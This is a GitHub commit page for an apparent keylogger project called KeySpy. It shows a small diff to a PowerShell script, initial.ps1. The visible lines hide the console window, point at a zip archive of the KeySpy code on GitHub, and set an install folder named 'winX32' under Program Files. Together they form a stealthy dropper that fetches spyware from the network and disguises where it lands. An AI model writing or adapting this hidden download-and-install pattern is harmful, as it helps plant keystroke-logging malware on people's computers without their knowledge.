Skip to content

Commit

Permalink
Merge branch 'main' of https://github.com/3rr0r-505/KeySpy
Browse files Browse the repository at this point in the history
  • Loading branch information
3rr0r-505 committed Apr 12, 2024
2 parents 8e3050e + f10d0b7 commit 53088d2
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion initial.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@ $consolePtr = [Console.Window]::GetConsoleWindow()
[Console.Window]::ShowWindow($consolePtr, 0)

# Define the URL of the zip file
$zipUrl = "https://github.com/3rr0r-505/KeySpy/archive/a5792dc2827315c545185671445f0112bd751264.zip"
$zipUrl = "https://github.com/3rr0r-505/KeySpy/archive/refs/heads/main.zip"

# Define the destination folder
$destinationFolder = "C:\Program Files (x86)\winX32"
Expand Down

0 comments on commit 53088d2

Please sign in to comment.